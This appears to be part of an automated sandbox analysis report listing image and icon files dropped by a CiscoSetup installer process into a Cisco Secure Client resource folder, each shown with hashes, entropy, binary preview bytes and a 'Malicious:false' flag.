                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-ILUPB.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-IQNAF.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-JBTOH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-JM4KN.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-JSJV1.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-JUVR7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-K36NI.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-KD64O.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-KV9DC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-LCN0H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-MEL1Q.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-MG7V1.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-MNUE3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
